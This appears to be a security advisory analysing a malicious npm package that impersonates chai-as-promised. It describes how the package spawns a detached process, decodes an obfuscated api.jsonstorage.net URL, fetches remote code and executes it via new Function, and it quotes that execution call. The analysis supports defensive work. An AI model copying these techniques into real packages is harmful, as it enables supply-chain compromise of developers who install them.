Package name impersonates the popular chai-as-promised assertion library, but its package.json description and keywords are copied from pino and the code is unrelated to chai. The package's main entry exports a middleware factory that spawns lib/caller.js as a detached node child process. lib/caller.js base64-decodes a hardcoded URL pointing at api.jsonstorage.net (a mutable third-party JSON storage service), GETs the JSON document, extracts the cookie field, and executes its contents via new Function.constructor('require', s)(require) with full access to require. The C2 URL and request headers are stored as base64 strings inside a locally redefined process object that shadows the real process global, then decoded with atob at runtime. Any consumer who installs and invokes the exported middleware triggers arbitrary attacker-controlled code execution; the attacker can rotate the payload served by the JSON storage endpoint at will.